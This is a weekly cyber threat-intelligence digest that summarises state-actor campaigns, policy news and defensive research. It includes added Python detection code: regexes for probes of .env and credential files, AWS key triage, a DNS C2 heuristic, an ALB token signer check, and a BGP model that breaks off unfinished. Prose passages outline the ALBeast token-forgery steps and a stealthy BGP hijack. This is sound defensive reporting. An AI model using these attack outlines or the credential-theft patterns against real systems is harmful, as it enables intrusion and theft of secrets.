Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally, nothing of particular note this week..
In the high-level this week:
Chevening India Cyber Security Fellowship - Chevening Awards announces - applications are open until October 10th - “The Chevening India Cyber Security Fellowship is aimed at mid-career professionals with demonstrable leadership potential in the field of cyber security or cyber policy in India. The fellowship is funded by the UK Foreign, Commonwealth, and Development Office.”
Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts - FBI and co state - “We have observed increasingly aggressive Iranian activity during this election cycle, specifically involving influence operations targeting the American public and cyber operations targeting presidential campaigns.”
Singapore's Operational Technology Cybersecurity Masterplan 2024 - Singapore Cyber Security Agency publishes - “the Masterplan 2024 also outlines updates in the areas of People, Processes, and Technology to uplift cybersecurity postures as part of our continuous efforts to enhance the cybersecurity of sectors operating OT systems and technologies:
Enhance the OT Cybersecurity Talent Pipeline
Enhance Information Sharing and Reporting
Uplift OT Cybersecurity Resilience beyond CII
Establish an OT Cybersecurity Centre of Excellence and promote Secure-By-Deployment throughout the lifecycle of the OT systems”
A separate registry could be created for white hat hackers - Vedomosti reports from Russia - “The Federation Council, FSB, Ministry of Internal Affairs and information security (IS) companies are discussing the possibility of creating a register of white hackers and their certification. Vedomosti was told about this by three sources close to various information security companies. According to them, the issue was discussed at a closed meeting of department representatives in early August.”
Ukrainian hackers show war footage on Russian TV, source says - The Kyiv Independent news desk reports - "Hackers of Ukraine's military intelligence agency (HUR) broke into servers of several Russian television channels and broadcast "objective videos about the war in Ukraine," a source in the agency told the Kyiv Independent on Aug. 22. According to the source, HUR's footage was displayed three times on prime-time TV channels: Pervouralsk TV, Eurasia 360, Eurasia Pervyi Kanal, and others. The targeted channels further reportedly included Lugansk 24, Pervyi Respublikanskyi, SpB, Oplot, TV-3, and Pervyi Rosiyskyi. Some of the targeted channels belong to Russian oligarch Andrey Komarov.”
Bureaucratic initiative redefines German law enforcement cyber operations - Binding Hook asserts - “Even though technically feasible, the federal legal framework provides no basis to clean up victim systems (such as the Emotet quarantining), a measure that would be considered an emergency response (Gefahrenabwehr, in German). Constitutionally, police action to avert danger is the remit of state police. The BKA, by contrast, is tasked with criminal prosecution. Under this distribution of power, operations that remove malware without prosecution objectives lack a clear legal framework. As the BKA’s actions in the Emotet case show, currently, the deactivation of malware is only possible in combination with efforts to secure evidence and is, legally, considered a side effect.”
FAA Equipment, Systems, and Network Information Security Protection - Federal Aviation Authority notifies - “This proposed rulemaking would impose new design standards to address cybersecurity threats for transport category airplanes, engines, and propellers. The intended effect of this proposed action is to standardize the FAA’s criteria for addressing cybersecurity threats, reducing certification costs and time while maintaining the same level of safety provided by current special conditions”
North Korean IT developers also develop domestic apps?... “Risk of abuse as a hacking tool” - Korean Broadcasting System reports - “The number of North Korean IT workers revealed by the National Intelligence Service is in the thousands worldwide,” - how is that insider threat programme?
[US] Army Cyber Command Foundry program provides data-centric military intelligence training - US Army announces - “ARCYBER G2 officials explained that they developed the training program to provide streamlined and comprehensive training material on the technical aspects of cyber-based knowledge. The courses extract the requisite technical elements of commercial and military courses and blend them with intelligence practices and tradecraft instrumental to wide-ranging cyber-related missions in support of U.S. Cyber Command priorities.”
Reporting on/from China
Tech war: China pumps up state subsidies for chip industry to counter US sanctions - South China Morning Post reports - “They showed that state backing for those companies amounted to 20.53 billion yuan (US$2.82 billion) last year, a 35 per cent increase from 2022.”
Huawei’s cloud unit sees Asia-Pacific as a vast market for AI products - South China Morning Post reports - “The cloud computing unit of Huawei Technologies sees Asia-Pacific as a potentially vast market for its artificial intelligence (AI) products, on the back of the 20-fold growth of its services in the region over the past four years in spite of US-led sanctions.”
Planned Huawei chip unit event stokes speculation over tech breakthrough - South China Morning Post reports - “A conference scheduled next month by Huawei Technologies’ secretive chip design unit HiSilicon has fanned speculation that a sanctions-busting breakthrough may be announced, triggering a surge in some China-listed tech stocks.”
Artificial intelligence
A benchmark for evaluating the cybersecurity capabilities and risks of language models - Stanford University publishes - “Cybench includes 40 professional-level Capture the Flag (CTF) tasks from 4 distinct CTF competitions, chosen to be recent, meaningful, and spanning a wide range of difficulties. We add subtasks, which break down a task into intermediary steps for more gradated evaluation, to 17 of the 40 tasks.”
The Global Race to Control A.I. - New York Times reports - “A.I. nationalism is part of a wider fracturing of the internet, where services vary based on local laws and national interests. What’s left is a new kind of tech world where the effects of A.I. in your life may just depend on where you live.”
Schumer Optimistic About Passing Federal AI Regulation This Year - Wall Street Journal reports - “We’re going to get a great AI package which keeps innovation as our North Star, hopefully through the Congress by the end of the year. We have great prospects,” said Senate Majority Leader Chuck Schumer (D., N.Y.).
California AI Regulation Bill Advances to Assembly Vote with Key Amendments - Campus Technology reports - “California’s "Safe and Secure Innovation for Frontier Artificial Intelligence Models Act" (Senate Bill 1047), spearheaded by Senator Scott Wiener (D-San Francisco), has cleared the Assembly Appropriations Committee with some significant amendments. The bill, aimed at establishing rigorous safety standards for large-scale artificial intelligence (AI) systems, is set for a vote on the Assembly floor on Aug. 20 and must pass by Aug. 31 to move forward”
South Africa National AI Policy Framework - South Africa government publishes - “The National Artificial Intelligence (AI) Policy Framework for South Africa (a first step in developing the National AI Policy) aims to promote the integration of Artificial Intelligence technologies to drive economic growth, enhance societal well-being, and position South Africa as a leader in AI innovation.”
Cyber proliferation
A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware - Lawfare asserts - “The inability of the international community to generate consensus on matters concerning fundamental human rights leaves UN member states with the choice of whether to sign the treaty without key human rights safeguards. However, if history is a teacher, it tells that mandating cross-border cooperation without mandating robust human rights commitments is not a tenable path forward in the fight against transnational cybercrime.”
Bounty Hunting
Pulaski County Man Sentenced for Cyber Intrusion and Aggravated Identity Theft - US Department of Justice reports - “The Defendant committed cyber intrusions, by hacking into state death registry systems to fake his own death to avoid paying his child support obligations. He also hacked into private businesses and attempted to sell access to networks on the dark web”
Member of Russian cybercrime group charged in Ohio - US Department of Justice reports - “According to court documents, Zolotarjovs is a member of a known cybercriminal organization that attacks computer systems of victims around the world. Among other things, the Russian cybercrime group steals victim data and threatens to release it unless the victim pays ransom in cryptocurrency. The group maintains a leaks and auction website that lists victim companies and offers stolen data for download.”
CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage - Financial Times reports - “the CrowdStrike executive said no vendor could “technically” guarantee that their own software would never cause a similar incident.” - might be true of vendors today, but formal methods/verification could be a way to change that..
InsurSec Can Drive An Effective Proactive Cybersecurity Strategy Says New Analyst Report - Omdia and At-Bay assert - “Cyber insurance requirements are a major factor in how organizations make security-buying decisions. 43% of all respondents report that cyber insurance requirements are a “major or leading driver” of cybersecurity spend. The percentage is even higher among the largest organizations, among which 52% report that cyber insurance requirements are a major driver of spending” - Report
Reflections this week come from the quality of applied cyber security research occurring in academia, as shown by the papers at USENIX Security '24 Summer. The breadth is impressive and on multiple fronts: from the quality of the vulnerability research on show, with a number of European universities clearly building impressive departments, through to the socio-technical aspects. Pull-through of this and other research is where the value will be realised, but rapid pull-through via commercial partnerships does not appear to exist at the level it should.
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday..
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
UAC-0020 (Vermin) using the topic of prisoners of war in the Kursk direction; new tool FIRMACHAGENT
Ukrainian government details this campaign where the distribution mechanism is not mentioned. The notable element is the deployment of new capability.
The mentioned archive contains a CHM file "list of vp dropped out. kursk.chm", which, among other things, contains an HTML file "part.html" containing JavaScript code, which in turn ensures the launch of an obfuscated PowerShell script.
The PowerShell code is designed to download components of the SPECTR malicious program (it steals documents, screenshots, Internet browser data, etc.) and the new FIRMACHAGENT program ("chrome_updater.dll"; the main task of which is to download stolen data to the management server).
https://cert.gov.ua/article/6280422
Malpedia alleges the Russian link:
Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.
https://malpedia.caad.fkie.fraunhofer.de/actor/uac-0020
Reporting on China
Nothing this week
Reporting on North Korea
TodoSwift Disguises Malware Download Behind Bitcoin PDF
Christopher Lopez details this alleged North Korean campaign, whose binary is signed by a Hong Kong firm, Leap World Hongkong Limited.
A signed file named TodoTasks was uploaded to VirusTotal on 2024-07-24. This application shares several behaviors with malware we’ve seen that originated in North Korea (DPRK)—specifically the threat actor known as BlueNoroff—such as KandyKorn and RustBucket; given these commonalities, we believe this new malware—which we’re dubbing TodoSwift—is likely from the same source.
https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf
MoonPeak malware from North Korean actors unveils new details on attacker infrastructure
Asheer Malhotra, Guilherme Venere and Vitor Ventura detail this alleged North Korean campaign, which apparently shows signs of development discipline in the form of test-driven development.
Cisco Talos is exposing infrastructure we assess with high confidence is being used by a state-sponsored North Korean nexus of threat actors we track as “UAT-5394," including for staging, command and control (C2) servers, and test machines the threat actors use to test their implants.
Our analysis of the threat actor’s infrastructure indicates they pivoted across C2s and staging servers to set up new infrastructure and modify existing servers.
This campaign consists of distributing a variant of the open-source XenoRAT malware we're calling “MoonPeak,” a remote access trojan (RAT) being actively developed by the threat actor.
Analysis of XenoRAT against MoonPeak malware samples we’ve discovered so far illustrates the evolution of the malware family after it was forked by the threat actors.
https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/
Exploited Zero-day
Emma Brownstein alleges that North Korea were exploiting a zero-day known as CVE-2024-38193.
[We] discovered that the Lazarus group was exploiting a hidden security flaw in a crucial part of Windows called the AFD.sys driver. We also discovered that they used a special type of malware called Fudmodule to hide their activities from security software.
https://www.gendigital.com/blog/news/innovation/protecting-windows-users
This malware (FudModule) was also covered in February 2024, when it was paired with a different zero-day, CVE-2024-21338 in appid.sys. If the reporting is accurate it shows they have at least one competent Windows driver vulnerability researcher and/or a source of such vulnerabilities.
Reporting on Iran
Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset
Joshua Miller, Georgi Mladenov, Andrew Northern, Greg Lesnewich and team detail this alleged Iranian campaign with notable victimology. That and the use of social engineering..
Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation.
The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link.
The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint.
The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration.
AnvilEcho contains all of TA453’s previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed.
GreenCharlie Infrastructure Linked to US Political Campaign Targeting
Insikt Group report on this alleged Iranian phishing related infrastructure.
From May 2024 onward, GreenCharlie registered a large number of dynamic DNS (DDNS) domains that have highly likely been used for targeted social engineering and phishing operations.
Insikt Group has established a direct infrastructure link between GreenCharlie clusters and malware referred to in open sources as GORBLE, which is reportedly linked to the targeting of US political candidates.
Analysis of Recorded Future Network Intelligence indicates that GreenCharlie threat actors likely used ProtonVPN or ProtonMail to enable their operations.
Iranian IP addresses were identified communicating with GreenCharlie infrastructure, which is likely part of the operation’s spearphishing component.
GreenCharlie’s victimology includes research and policy analysts, government officials, diplomats, and high-value strategic targets. While Insikt Group has not identified direct evidence of the targeting of US government and political campaign officials, open-source reporting has enabled us to establish a credible link.
GreenCharlie highly likely operates at the behest of the Islamic Revolutionary Guard Corps (IRGC); due to its persistent and strategic remit, it is also likely to be associated with the Intelligence Organization of the IRGC (IRGC-IO).
https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf
Reporting on Other Actors
Ransomware Tool Matrix: A resource containing all the tools each ransomware gangs uses
Will does what he does best in this release.
This repository contains a list of which tools each ransomware gang or extortionist gang uses
As defenders, we should exploit the fact that many of the tools used by these cybercriminals are often reused
We can threat hunt, deploy detections, and block these tools to eliminate the ability of adversaries to launch intrusions
This project will be updated as additional intelligence on ransomware gang TTPs is made available
https://github.com/BushidoUK/Ransomware-Tool-Matrix
https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
The Abuse of ITarian RMM by Dolphin Loader
RussianPanda evidences how legitimate, code-signed software is being integrated into malicious campaigns to avoid being detected / flagged as malicious.
Some of the Dolphin Loader payloads currently have zero detections on VirusTotal. Why? Because it uses legitimate, EV-signed remote management software to deliver the final payload. This approach is very convenient for the loader’s developer because it eliminates the need to obtain an EV certificate and end up paying a significant amount of money out-of-pocket. Leveraging legitimate RMM software to deliver malware also offers numerous advantages:
Since RMM tools are meant to run quietly in the background because they monitor and manage systems, malware leveraging these tools can operate stealthily, avoiding detection by users.
RMM tools already include features for remote command or script execution, system monitoring, and data exfiltration. Attackers can use these built-in functionalities to control compromised systems.
Organizations trust their RMM solutions for IT operations. This trust can be exploited by attackers to deliver malware without raising immediate suspicion from users or IT staff.
https://russianpanda.com/The-Abuse-of-ITarian-RMM-by-Dolphin-Loader
Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments
Unit 42 detail a campaign where the scale of scanning is the thing of note in this reporting, that and a trivially exploitable issue which can have devastating consequences.
Unit 42 researchers found an extortion campaign's cloud operation that successfully compromised and extorted multiple victim organizations. It did so by leveraging exposed environment variable files (.env files) that contained sensitive variables such as credentials belonging to various applications.
Multiple security missteps were present in the course of this campaign, including the following:
Exposing environment variables
Using long-lived credentials
Absence of least privilege architecture
The campaign operation set up its attack infrastructure within various organizations’ Amazon Web Services (AWS) environments and used that groundwork to scan more than 230 million unique targets for sensitive information.
https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
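Two checks a defender can run against the missteps Unit 42 lists, as an added example that is not code from the Unit 42 report: the first hunts web access logs for the sweep pattern (requests to .env and similar dotfiles, with 200s marking the files that are actually exposed), the second triages the contents of an exposed .env and separates long-lived IAM user keys (AKIA prefix) from temporary STS keys (ASIA). The log lines, the .env body and the hostnames are constructed; AKIAIOSFODNN7EXAMPLE is the placeholder key ID from the AWS documentation.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format; they are not from the Unit 42 report.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [20/Aug/2024:10:01:02 +0000] "GET /.env HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.7 - - [20/Aug/2024:10:01:03 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [20/Aug/2024:10:01:03 +0000] "GET /backup/.env HTTP/1.1" 200 388 "-" "python-requests/2.31"
198.51.100.20 - - [20/Aug/2024:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [20/Aug/2024:10:02:11 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

# Constructed .env body; AKIAIOSFODNN7EXAMPLE is the placeholder key ID from the AWS docs.
SAMPLE_ENV = """\
APP_ENV=production
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
DB_PASSWORD=s3cret
MAIL_HOST=smtp.example.com
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Files that should never be web-reachable; the query string is stripped before matching.
SENSITIVE_PATH_RE = re.compile(r'(^|/)(\.env(\.[\w.-]+)?|\.git/config|\.aws/credentials|wp-config\.php\.bak)$')

def find_dotfile_probes(log_text):
    """Map each client IP to the sensitive paths it requested and the status it got.
    A 200 is the exposure itself; 404s from the same IP are the sweep pattern."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and SENSITIVE_PATH_RE.search(m['path'].split('?', 1)[0]):
            hits[m['ip']].append((m['path'], int(m['status'])))
    return dict(hits)

def exposed_paths(hits):
    """Paths that actually returned 200, i.e. files that are reachable right now."""
    return sorted({path for entries in hits.values() for path, status in entries if status == 200})

AWS_KEY_RE = re.compile(r'(AKIA|ASIA)[A-Z0-9]{16}')
KEY_KIND = {"AKIA": "long-lived IAM user key", "ASIA": "temporary STS key"}
SECRET_NAME_RE = re.compile(r'SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY', re.I)

def triage_env(env_text):
    """Classify KEY=VALUE lines of an exposed .env: AWS key IDs by prefix (AKIA means a
    long-lived key, the kind this campaign abused) and any other secret-looking name."""
    findings = []
    for raw in env_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' not in line:
            continue
        key, value = line.split('=', 1)
        value = value.strip().strip('"\'')
        m = AWS_KEY_RE.fullmatch(value)
        if m:
            findings.append((key, KEY_KIND[m.group(1)]))
        elif value and SECRET_NAME_RE.search(key):
            findings.append((key, "secret-looking value"))
    return findings
```

Any AKIA key that turns up in `triage_env` output should be treated as compromised and rotated; the IAM side of the fix is to replace it with a role so that only short-lived ASIA credentials exist to leak.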
New Backdoor Targeting Taiwan Employs Stealthy Communications
Symantec detail this unattributed but interesting campaign which solely uses DNS for command and control. Also interesting that a recent web server vulnerability is apparently being used for initial access.
A previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan.
The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen.
..
The initial intrusion was likely through the exploit of a recently patched PHP vulnerability (CVE-2024-4577). The vulnerability is a CGI argument injection flaw affecting all versions of PHP installed on the Windows operating system. Successful exploitation of the vulnerability can lead to remote code execution.
https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns
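The Symantec write-up does not include detection logic, so the following is an added example of the kind of heuristic a resolver-log hunt for DNS command-and-control uses: per registered domain, count queries, the fraction that use a never-seen-before subdomain, and the Shannon entropy of the leftmost label. Data-carrying C2 looks like many unique, high-entropy labels under one parent domain, which is what the constructed log below models; the domain names, client IPs and thresholds are assumptions, and the two-label "registered domain" shortcut should be replaced with a public suffix list in production.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log as (timestamp, client, qtype, qname); not from the Symantec report.
SAMPLE_DNS_LOG = [
    ("2024-08-19T09:00:01", "10.0.0.5", "A", "www.example.com"),
    ("2024-08-19T09:00:02", "10.0.0.5", "A", "cdn.example.com"),
    ("2024-08-19T09:00:05", "10.0.0.9", "A", "3f9a1c0e7b2d4a6f.update-srv.example.net"),
    ("2024-08-19T09:00:06", "10.0.0.9", "A", "a81d2c9e4f7b3a1c.update-srv.example.net"),
    ("2024-08-19T09:00:07", "10.0.0.9", "A", "c4e2b7d9a0f13e58.update-srv.example.net"),
    ("2024-08-19T09:00:08", "10.0.0.9", "A", "e7b3d1a9c2f0548a.update-srv.example.net"),
    ("2024-08-19T09:00:09", "10.0.0.9", "A", "b2c8f0a1d3e97654.update-srv.example.net"),
    ("2024-08-19T09:00:10", "10.0.0.9", "A", "d9a4c1e3f7b20865.update-srv.example.net"),
    ("2024-08-19T09:00:11", "10.0.0.5", "A", "mail.example.com"),
]

def shannon_entropy(s):
    """Bits per character; encoded/encrypted data in a label pushes this towards log2(alphabet)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def registered_domain(qname):
    # Naive two-label cut; use the public suffix list for real data (co.uk etc.).
    labels = qname.rstrip('.').lower().split('.')
    return '.'.join(labels[-2:])

def profile_dns(log):
    """Aggregate per registered domain: query count, distinct subdomains, clients, label entropies."""
    per = defaultdict(lambda: {"queries": 0, "subdomains": set(), "clients": set(), "entropies": []})
    for _ts, client, _qtype, qname in log:
        dom = registered_domain(qname)
        sub = qname.rstrip('.').lower()[:-len(dom)].rstrip('.')
        p = per[dom]
        p["queries"] += 1
        p["clients"].add(client)
        if sub:
            p["subdomains"].add(sub)
            p["entropies"].append(shannon_entropy(sub.split('.')[0]))
    return per

def flag_dns_c2(log, min_queries=5, min_unique_ratio=0.8, min_entropy=3.0):
    """Domains whose traffic is mostly unique, high-entropy subdomains (thresholds are assumptions)."""
    flagged = {}
    for dom, p in profile_dns(log).items():
        if p["queries"] < min_queries:
            continue
        unique_ratio = len(p["subdomains"]) / p["queries"]
        mean_entropy = sum(p["entropies"]) / len(p["entropies"]) if p["entropies"] else 0.0
        if unique_ratio >= min_unique_ratio and mean_entropy >= min_entropy:
            flagged[dom] = {"queries": p["queries"], "unique_subdomains": len(p["subdomains"]),
                            "mean_entropy": round(mean_entropy, 2), "clients": sorted(p["clients"])}
    return flagged
```

Run it over a window of resolver logs rather than a whole day: CDNs and anti-virus lookups also generate unique labels, so tune the thresholds against your own baseline and treat the output as a lead for the analyst, not a verdict.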
Discovery
How we find and understand the latent compromises within our environments.
Windows Update log files
and Get-WindowsUpdateLog in PowerShell - to support detection of Windows Downdate (see below).
https://learn.microsoft.com/en-us/windows/deployment/update/windows-update-logs
ShellSweepX
Michael Haag releases a new capability to detect webshells - go forth and discover latent compromises!
ShellSweepX is an advanced, ML-powered web shell detection and analysis platform designed to enhance your organization's cybersecurity posture. By leveraging machine learning algorithms and YARA rules, ShellSweepX provides robust protection against web-based threats, particularly focusing on the identification and analysis of potential web shells.
https://github.com/splunk/ShellSweep/wiki/ShellSweepX
Notepad TabState artifact files analysis
AbdulRhman Alfaifi shows the value of tracking feature evolution for the forensic opportunities it creates.
On Windows 11, Notepad stores a cache of recently opened files. This cache contains valuable information, such as file paths, file contents, and other useful data. In this article, we will examine the structure of the Notepad cache and provide a custom parser to extract this information for forensic investigations.
https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/
Defence
How we proactively defend our environments.
Best practices for event logging and threat detection
ASD + 5EYES + friends co-seal these best practices.. go forth and log!
This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners:
United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA)
United Kingdom (UK) National Cyber Security Centre (NCSC-UK)
Canadian Centre for Cyber Security (CCCS)
New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ)
Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC)
The Republic of Korea National Intelligence Services (NIS) and NIS’s National Cyber Security Center (NCSC-Korea)
Singapore Cyber Security Agency (CSA)
The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).
..
There are four key factors to consider when pursuing logging best practices:
enterprise-approved event logging policy
centralised event log access and correlation
secure storage and event log integrity
detection strategy for relevant threats.
Exposing Security Observability Gaps in AWS Native Security Tooling
Jonathan Walker provides an interesting analysis..
https://www.securityrunners.io/post/exposing-security-observability-gaps-in-aws
ALBeast
Daniel Shechter details a clearly common configuration; organisations should check they are not affected, given the authentication bypass it enables.
First, the attacker creates their own ALB instance with authentication configured in their account. The attacker then uses this ALB to sign a token they fully control. Next, the attacker alters the ALB configuration and sets the issuer field to the victim's expected issuer. AWS subsequently signs the attacker's forged token with the victim's issuer. Finally, the attacker uses this minted token against the victim's application, bypassing both authentication and authorization.
..
On July 19th, 2024, AWS updated the authentication feature documentation to clarify best practices for Security Groups:“Also, as a security best practice we recommend you restrict your targets to only receive traffic from your Application Load Balancer. You can achieve this by configuring your targets' security group to reference the load balancer's security group ID.”
..
AWS does not consider issuer forging an ALB vulnerability and has stated that the service operates as intended. They highlighted the shared responsibility model, suggesting that customers should ensure their code and configurations are up-to-date to mitigate this issue.
..
[We] identified over 15,000 (out of 371,000*) potentially vulnerable ALBs and applications using AWS ALB’s authentication feature. We’ve done our best to contact each affected organization with our findings and provide support where needed.
https://www.miggo.io/resources/albeast-security-advisory-alb-vulnerability
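The application-side check that defeats the issuer forgery described above, as an added example that is not Miggo's or AWS's code: the ALB puts the ARN of the load balancer that signed the token in the `signer` field of the JWT header it sends in `x-amzn-oidc-data`, so a backend must compare that field against its own ALB's ARN before it trusts `iss` or any payload claim. The ARNs, issuer and user claims below are constructed, the token signature is a placeholder, and `verify_signature` is a hook for the real ES256 check (which fetches the public key for `kid` from `https://public-keys.auth.elb.<region>.amazonaws.com/<kid>`); the security-group restriction quoted above is still needed so requests cannot bypass the ALB altogether.

```python
import base64
import json
import time

def _b64url_decode(segment):
    # Accept padded and unpadded base64url: ALB tokens carry padding, which strict JWT libraries reject.
    segment = segment.rstrip('=')
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))

def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

def make_token(header, payload, signature=b'constructed-signature'):
    """Assemble a JWT-shaped token for the example; the signature bytes are a placeholder."""
    return '.'.join([_b64url_encode(json.dumps(header).encode()),
                     _b64url_encode(json.dumps(payload).encode()),
                     _b64url_encode(signature)])

def check_alb_token(token, expected_signer_arn, verify_signature, now=None):
    """Return (ok, detail). The signer ARN is checked before anything in the payload is
    believed: an attacker-owned ALB can be configured with the victim's issuer, but the
    signer field names the ALB that actually produced the token."""
    now = time.time() if now is None else now
    try:
        h_seg, p_seg, s_seg = token.split('.')
        header = json.loads(_b64url_decode(h_seg))
        payload = json.loads(_b64url_decode(p_seg))
    except ValueError:
        return False, "malformed token"
    if header.get('alg') != 'ES256':
        return False, "unexpected alg"
    if header.get('signer') != expected_signer_arn:
        return False, "signer mismatch: %s" % header.get('signer')
    if float(payload.get('exp', 0)) <= now:
        return False, "expired"
    if not verify_signature(header.get('kid'), (h_seg + '.' + p_seg).encode(), _b64url_decode(s_seg)):
        return False, "bad signature"
    return True, payload.get('sub')

# Constructed identifiers for the walk-through.
VICTIM_ALB = "arn:aws:elasticloadbalancing:us-east-1:111111111111:loadbalancer/app/victim-alb/0123456789abcdef"
ATTACKER_ALB = "arn:aws:elasticloadbalancing:us-east-1:222222222222:loadbalancer/app/attacker-alb/fedcba9876543210"
ISSUER = "https://idp.example.com"

def demo_tokens(now):
    """A legitimate token and a forged one: same iss, same claims, different signer."""
    header = {"alg": "ES256", "kid": "kid-1", "iss": ISSUER, "client": "app-client", "exp": now + 120}
    payload = {"sub": "alice", "email": "alice@example.com", "exp": now + 120}
    legit = make_token(dict(header, signer=VICTIM_ALB), payload)
    forged = make_token(dict(header, signer=ATTACKER_ALB), payload)
    return legit, forged
```

In the test the signature hook always returns true, which is exactly why the signer check matters: AWS really did sign the forged token, just with a different load balancer's key, so signature validity alone proves nothing about which ALB the request came through.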
JA4 fingerprints and inter-request signals
Alex Bocharov and Adam Martinetti show an evolution in JA4 application which is fascinating..
JA4 Signals are inter-request features computed based on the last hour of all traffic that Cloudflare sees globally. On a daily basis, we analyze over 15 million unique JA4 fingerprints generated from more than 500 million user agents and billions of IP addresses. This breadth of data enables JA4 Signals to provide aggregated statistics that offer deeper insights into global traffic patterns – far beyond what single-request or connection fingerprinting can achieve. These signals are crucial for enhancing security measures, whether through simple firewall rules, Workers scripts, or advanced machine learning models.
https://blog.cloudflare.com/ja4-signals
Incident Writeups & Disclosures
How they got in and what they did.
Nothing this week
Vulnerability
Our attack surface.
SonicOS Improper Access Control
Vendor advisory.
An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
Global BGP Attacks that Evade Route Monitoring
Henry Birge-Lee, Maria Apostolaki and Jennifer Rexford detail a twist which may cause some detection headaches..
As the deployment of comprehensive Border Gateway Protocol (BGP) security measures is still in progress, BGP monitoring continues to play a critical role in protecting the Internet from routing attacks. Fundamentally, monitoring involves observing BGP feeds to detect suspicious announcements and taking defensive action. However, BGP monitoring relies on seeing the malicious BGP announcement in the first place! In this paper, we develop a novel attack that can hide itself from all state-of-the-art BGP monitoring systems we tested while affecting the entire Internet. The attack involves launching a sub-prefix hijack with the RFC-specified NO_EXPORT community attached to prevent networks with the malicious route installed from sending the route to BGP monitoring systems. We study the viability of this attack at four tier-1 networks and find all networks we studied were vulnerable to the attack. Finally, we propose a mitigation that significantly improves the robustness of the BGP monitoring ecosystem
https://arxiv.org/pdf/2408.09622
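A small propagation model of the attack, added here as an illustration and not code from the paper: the sub-prefix hijack carries NO_EXPORT, so the tier-1s that receive it install it and forward traffic to the attacker but never re-advertise it, not even to a route collector peering with them. The topology (tier-1s T1 and T2, transit A and B, victim V behind A, multihomed attacker M behind both tier-1s), the prefixes and the collector placement are constructed; propagation is plain flooding with shortest AS path, which ignores valley-free policy but is enough to show the visibility gap.

```python
from collections import deque

# Constructed AS-level topology (not from the paper), as undirected eBGP adjacencies.
LINKS = [("T1", "T2"), ("T1", "A"), ("T2", "B"), ("A", "V"), ("T1", "M"), ("T2", "M")]

def build_graph(links):
    g = {}
    for a, b in links:
        g.setdefault(a, set()).add(b)
        g.setdefault(b, set()).add(a)
    return g

def announce(graph, rib, origin, prefix, no_export=False):
    """Flood a prefix from origin; each AS keeps the first (shortest) path it hears.
    A route received with NO_EXPORT is installed but never re-advertised to another
    AS (RFC 1997), so it stops one eBGP hop from the origin."""
    rib.setdefault(origin, {})[prefix] = {"path": [origin], "no_export": False}
    queue = deque([origin])
    while queue:
        cur = queue.popleft()
        if rib[cur][prefix]["no_export"]:
            continue
        for nbr in sorted(graph[cur]):
            if prefix in rib.setdefault(nbr, {}):
                continue
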